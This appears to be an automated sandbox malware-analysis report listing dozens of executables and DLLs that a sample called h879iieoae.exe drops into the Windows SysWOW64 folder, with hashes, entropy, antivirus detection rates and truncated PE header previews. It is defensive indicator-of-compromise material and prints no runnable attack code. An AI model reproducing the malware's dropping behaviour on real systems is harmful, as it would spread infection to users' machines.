                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Foelkeee.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Bgibkegc.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.88604670303652
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10SB+BDq9J5SV3DY:CSVVEPozmB74B+FqX5S1D
                          MD5:4AC72E51040613B899E1383DBC52D030
                          SHA1:A93C2A2EFE25BE4B41EECC4D44F1220DB2C65342
                          SHA-256:9413A58BD46048350C722B0AE4241619210ADE1A08998277FA521F76161ED970
                          SHA-512:B7F4CD2AC9672C77BE72E95FD6EC0F21D4523072C9DE03214640EBF85BA54DA9E3CF631517F5C4B443F098A2515A3214F0E62ED793D648264870EEDB00B54787
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Gfdcflnh.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Efgkjnfn.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885572674896782
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10GB+BDq9J5SV3DY:CSVVEPozmB7wB+FqX5S1D
                          MD5:5A64C90933C6B63A4BEACD497AFFB868
                          SHA1:749E648BE4B9F66AA7D05E4BA6FF1F91B3A5A762
                          SHA-256:32B2F8923DCFAF6AE7BBC9503046A9F4170DA3EB4F9626264EF71116ADC42C5E
                          SHA-512:9E6EB20C45D6E0F0E26BC4809392983A5D245E7DF27D252B26DA5820B76DD0D4570E25A1EF51000C960041DDB103E516AB319C6C0000D8B1F5BA8451F9B02E59
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ggmnlk32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Foaigifk.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.017206911109038
                          Encrypted:false
                          SSDEEP:3072:i4eIF2e9kzg8qUgCREXdXNKT1ntPG9poDrFDHZtOgl:iVIF2RzmUfCN9Otopg5tTl
                          MD5:7C0C736EA42E96EFCBA80D317BD1A29B
                          SHA1:F83108C8A93C35896B4BDC1A74A8B83B2C07D463
                          SHA-256:E35DB3634FD3CAF2178AFA66E823055E26E7F0C82F4D6127AA50790D78890B47
                          SHA-512:3E09925DC06F43F9A367476A701CEDC257CE10EE9C9D6CC16D1CE11E26081E148376FE5B54E3E620B101CD483B9D53235B0FABEDD31D7C35C37BCB322E51CC07
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Hdgplo32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Feidnc32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8864778178380104
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10RB+BDq9J5SV3DY:CSVVEPozmB7fB+FqX5S1D
                          MD5:8B82F1EFBB2C31B67DA32AA4BC5E6970
                          SHA1:F54F211D1E14D12415F6DA8C2E691F6ABD91AFDD
                          SHA-256:AF3C4D3331D2407E51597AF2EADB093EDC581DAD8462CC667C3333E7AA7A993F
                          SHA-512:404570256B70B7784F2B2C25816D6694F81EAF33C11CF5C008AC647B07C144E900633B0C43285AB69779F32B5A996A13D561D25DB780A7E870E9FEEEDA8DC019
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Hjanmb32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Opbieagi.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861450990154975
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU1053B+BDq9J5SV3DY:CSVVEPozmB7rB+FqX5S1D
                          MD5:991F572DAA7F3512471426098E125B18
                          SHA1:BFBFC2089E70760A99E9854E778DD1DD4417E64D
                          SHA-256:4830BC8285DDBBC91C0023BFD8735F0EBE832154B33B63EF0850640EA931EBC9
                          SHA-512:9980C3DEC7EB505C7DA6695D79D96A1F0C781851D7F4C89125323F84745CFCBDA0346CBB5441C0046559C963CB9F529E98221C60A48BE64C36D836F5764DE319
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 92%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Hjdhea32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Dmfdkj32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885564494396584
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10aB+BDq9J5SV3DY:CSVVEPozmB7cB+FqX5S1D
                          MD5:0D2D3CFFAD2A527E808B87FADC7913EF
                          SHA1:5363C5FFE5BD09231FBBE2C1AF0CD04BA624C3F6
                          SHA-256:D5762FBFFB75037FD96626E9C5BAD71E527CC0E5F42E341616742702DBC42E1F
                          SHA-512:E7035FB1CFAFFA5E18AD1A7824054C754D0D188C5DAC172DF0D996212B6D7BE619354B55239A83C44D2911214F3F68CEF332707C88100C14908A72E682A7F6D8
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Hjjfnehb.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Ceampi32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885243551552366
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU101kB+BDq9J5SV3DY:CSVVEPozmB7fkB+FqX5S1D
                          MD5:C65D8196AE09D571E0BCA6EF1DEE8DC6
                          SHA1:122441D02298668A31B09940E45B9CD0A6542672
                          SHA-256:D241C35C326199656DC164F2E11A93C9067CEED6D23157E8C87B7DC33819873C
                          SHA-512:D21E4AB5DFEEC6B6F74F66D02F26469E53016C5942B039E1B54DE35C6012B9904E0C4CE27F4B59217C4D3999BC28D5260BBCDB8A704D90A5C000B302728C1C39
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ibbpip32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Camgpi32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8858637774811133
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU102B+BDq9J5SV3DY:CSVVEPozmB7EB+FqX5S1D
                          MD5:FBF9FB1321C4951A8B2D3EA609484E8A
                          SHA1:C02AB4F1EEF4BED492567A90813B0641BDA1C333
                          SHA-256:02833DCF979AEAC50ADC7522AB5A8957DFB339008F50AECEF4CE3F7F348EF6F9
                          SHA-512:D48FD5B4CE67862A5CFD6B633BD0E945C3B4B867202DC2E786EAF3830D1C4DB4B25AECE4D1D465626A780B1B9AC2A609AD2DF69738014E997B4D9D9B5B7E7B0D
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ibigijoc.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Cfnpmb32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885816997493956
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10MB+BDq9J5SV3DY:CSVVEPozmB7CB+FqX5S1D
                          MD5:DE7828FF0906BB747EC773C746D3348F
                          SHA1:671C2AAB21021CBF75A839CF8C467D20D0677663
                          SHA-256:7DCA31B36589E998E6B57E11DCF85A275A5C9B17F8136AD08B14E3FF2070B720
                          SHA-512:FE721D2CA4A5273176F58E8BA5FB004A85DA49D86B2624E514D326BAD1281716548AE8845E22D7DE904CE4034CEB40F4F094235BDB97470229D99D86B839587B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 88%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Iemjhp32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Ajkolbad.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8850555329354424
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10eUB+BDq9J5SV3DY:CSVVEPozmB7RB+FqX5S1D
                          MD5:FB0235D41A43088844FB9B0B5069BDDB
                          SHA1:B03B587C54E1E2E29ED1154552A3C3517E3BAB64
                          SHA-256:50C9367F164DD0D9A3776813ABE810C7569A389374B2FECF8DCF7C459BD34E55
                          SHA-512:224B245471D45C835B6F9458C0FA611C6428623B0795669BA0B07137BA0B4716F58EC80D9A1A6BE340F595E17876C23F3C1F94B76C675EF6EC6CDF87C6BD05F8
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ipqipqal.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Ccapffke.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8857049728382753
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10vB+BDq9J5SV3DY:CSVVEPozmB7tB+FqX5S1D
                          MD5:AA4C8909A7FA635B986B1A8A1957C92E
                          SHA1:D50A2CD9D2F97EBACBCA101612A6781CF666602D
                          SHA-256:96D940EF284DF959E4DAC46639032C81826C1D38175FB59FD9D17E9BB997C5CF
                          SHA-512:0C058623C2E935E013D5867A58AD814F41D38369EA90FDE3E783D678D06024F5B1DD2DFEAE9CE9BF70CC442FCEF6EC1EEE6A2D3AC96445D3090189B298E51ACF
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Jcofqqkm.dll

                          Download File
                          Process:C:\Users\user\Desktop\h879iieoae.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:modified
                          Size (bytes):6657
                          Entropy (8bit):2.8859070814843144
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10P6/B+BDq9J5SV3DY:CSVVEPozmB7F6/B+FqX5S1D
                          MD5:67B1FF9356941F205A17BEF688D68477
                          SHA1:68409BFB4DD044C52C2E5EEF664B7C42189ABD59
                          SHA-256:06C33A515B36B6FC805F55790BA0CCCF9D64C15C321760B5732647E28BA0346C
                          SHA-512:396B13E5966E5C66CD6B34F20BF5A292CA7E4D108ED06F2D06D088E0E3242E65490003B924C0A0A6BC712BF9AEA5224CE759137A89841F0E5F369DA27B6FD26A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Jdackq32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Oglabl32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8858663166842526
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10M/B+BDq9J5SV3DY:CSVVEPozmB7K/B+FqX5S1D
                          MD5:772F4DDB505F23FDD3DA9F62D9332927
                          SHA1:F31CB7824BE0F5200BF0C751CD188DC9B2512566
                          SHA-256:F3030FA2CED9FDBB4DD104E57BAF9BFE4ABE6930FA0EB2A59E71332B6ABEF5C4
                          SHA-512:6C7B206D57C86322DD7300F4EACECD4CE0FDACE71025A3EC5FEB8E64777CABA88D408D2DE12921D01E36D47E2E54D4CF75D8B0776E69B486A0376928848E598C
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Jgemldcp.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Onkcje32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885596352101298
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10wB+BDq9J5SV3DY:CSVVEPozmB7eB+FqX5S1D
                          MD5:AC75014F9EA9F86B2D79607E479F8240
                          SHA1:EE861D13708D82445F6BE60FE63EEC4600D41CE7
                          SHA-256:5B9F6BEB2C0F622486F8D78C266B6ADAEBB9BF85D1B16CBFEAE5BC9DA93AE33F
                          SHA-512:8DF9AEEB0E0AF98F879839AA19EEB3C556344B631B79BE2DE3019723DEB5581DF63C57E298C3821D039E1AA8B644131AE1683A1DA864E01A83F0230C8F40599F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Kfnpbj32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Edgbhcim.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8856603370560716
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU100B+BDq9J5SV3DY:CSVVEPozmB7OB+FqX5S1D
                          MD5:06D813D816B926989AEFF79806F6D076
                          SHA1:791ADB92261CFD1B651C41F089DA38791E30FDE8
                          SHA-256:A6377AF564D5F8CFB8FF365BC83535349A70A6ED524BA15C20F90DC3F3A8B445
                          SHA-512:AEE153AB5D6F57A3BBB2F490C216E2C06FAC83B4C5DD4992E108C762DA43ADA46C2A88CCF4985BB2834945A0701269842570E912E5327BB6B9B6BF2D986E68FB
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Khlnhl32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Qgcpihjl.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.88523084802412
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU105B+BDq9J5SV3DY:CSVVEPozmB77B+FqX5S1D
                          MD5:B8B687E5C4A375DD34CFFDD1BC8EA223
                          SHA1:D6D4E5273E6A27E3A67B156F2FAAEFCD3A13CF97
                          SHA-256:C53A2F28EFF830CECB4D44FA0AA562836213173C471CCF0CA6F19F7EF10B44D9
                          SHA-512:63D42BCE806CC0C4ED5A4998B9294FAC226BD6AD6397F8B550590A981AF7894D1E7421D422A20ADFA7F7FCF6C8625D55700E505251627E9E7A85F7FBC4DF6B4A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Lbfpda32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Eoappk32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8866255630560382
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10eUB+BDq9J5SV3DY:CSVVEPozmB78UB+FqX5S1D
                          MD5:0892D63580EC00EC3AA968ED2EDB065E
                          SHA1:F04403EF04B89372D08B6EA2A08F9CF93078ACC5
                          SHA-256:12D88A4867FCD7D99AA4AFFC6BE6728D7DE67A6815E62FD2E8AAA5DD04EB0673
                          SHA-512:77455E67BFC05AB2D34A67E1DD95F3A8365D609BBE3988BB72E9030B82C23289C829820C1162BB7FCEDBD4E97AA91CCE4456FA32CC9D7C59469985AB3C573BC2
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Lfcadoap.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Plbmqa32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861660553601896
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10KMB+BDq9J5SV3DY:CSVVEPozmB70MB+FqX5S1D
                          MD5:2BE4FC3710E3BE149FAB6EF818C21EA7
                          SHA1:8669EF290A7719B940173DFFAE1503781BC5D77B
                          SHA-256:89412D437E442998934D6D5F12577F492D97B6310DF52B67C2BA10C82030AB00
                          SHA-512:5DF4B99435FDD2D7991A7716AA82CD6E1105ED6FB87D645957E7578CEDA9A0A6D5F217C96F5F2B159E216A132AE13B45E3F2ABA6A3A86460A3F5F1D340799693
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 89%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Lfjejf32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Bqjacldl.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8854985134492592
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10yB+BDq9J5SV3DY:CSVVEPozmB7YB+FqX5S1D
                          MD5:A16432C6BFB3A06428BD8B24CB23307E
                          SHA1:ECABE2C3478DFE3D1C5E9317A086177FB770D9B0
                          SHA-256:CC5712C0C85A3206DE50863AEC2022854F89CD13BB750C823E2E567C364DE8FA
                          SHA-512:64433BF750232C8D9FB6D96CF55BE5F82F724D941012FCD97EBDF0DCFB8636B65EDA5DE57F053096B36C09606556BD91AF3CB6DB3A77F37B19B3667ECC2AD786
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Ligdce32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Olijjb32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885337620948508
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10qB+BDq9J5SV3DY:CSVVEPozmB7IB+FqX5S1D
                          MD5:967CD38BCD25E3A55FEBBCCAE5FAF052
                          SHA1:F330DAC769F0F4598A17155145C801AE43268E2A
                          SHA-256:E0C9DFE969C7C75A82DBCB452CCD507EFFFAFC9E9AFBACE94AE3CA82990EA6F4
                          SHA-512:0052BB63DD0651957F8B69C647445E9BDBF9665860C187BA1C750822C57FCF24D98D1E8CD62EE7EF3A7A4FB3B5AF3D6F220171D632CC38D18A1E399F97EC98AA
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Mfdadc32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Bmlhnnne.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885915616346283
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10BB+BDq9J5SV3DY:CSVVEPozmB7HB+FqX5S1D
                          MD5:953DE6B8919B6B8F13BF6701F5B7F6BB
                          SHA1:9BF0CADD8E11A8356A364A23CC0571E0D36D58C8
                          SHA-256:C13C45DFA17FD6EA8E009C1AFECDAD046B7A3C79CAC55E2CDEF6C05D1F49D3A5
                          SHA-512:33773C98B501D8ED611D5323D2EFF34A6976214BA9E6A37E2E3F77D98647AFDBD5964AA6135366048F3CE21658811BDD7BB76A496BCA10B3267AFE128F780180
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Nejhbi32.exe

                          Download File
                          Process:C:\Users\user\Desktop\h879iieoae.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.029371798942588
                          Encrypted:false
                          SSDEEP:3072:C9YQqNMGFWWbvbe3z11111111csxICREXdXNKT1ntPG9poDrFDHZtOgl:hQqNMzz111111111HCN9Otopg5tTl
                          MD5:0603E4CBD8760D07DD7DCAB05A92238A
                          SHA1:597FDCB8EBFC258FB014BE6F06F824C161F90785
                          SHA-256:85DE77A21C40364383D0CD6E05D6A1CCD7013F395A40F51DA79495AAC80AF916
                          SHA-512:8998895ADC2CEA78F3FE64C37A6D460A10066FEB146915315D1DC1CADABEFB0B0E39994290CCA14F5659F7CC13D34776635FC657714EEAA63EA91A75142522CC
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Nejhbi32.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\h879iieoae.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
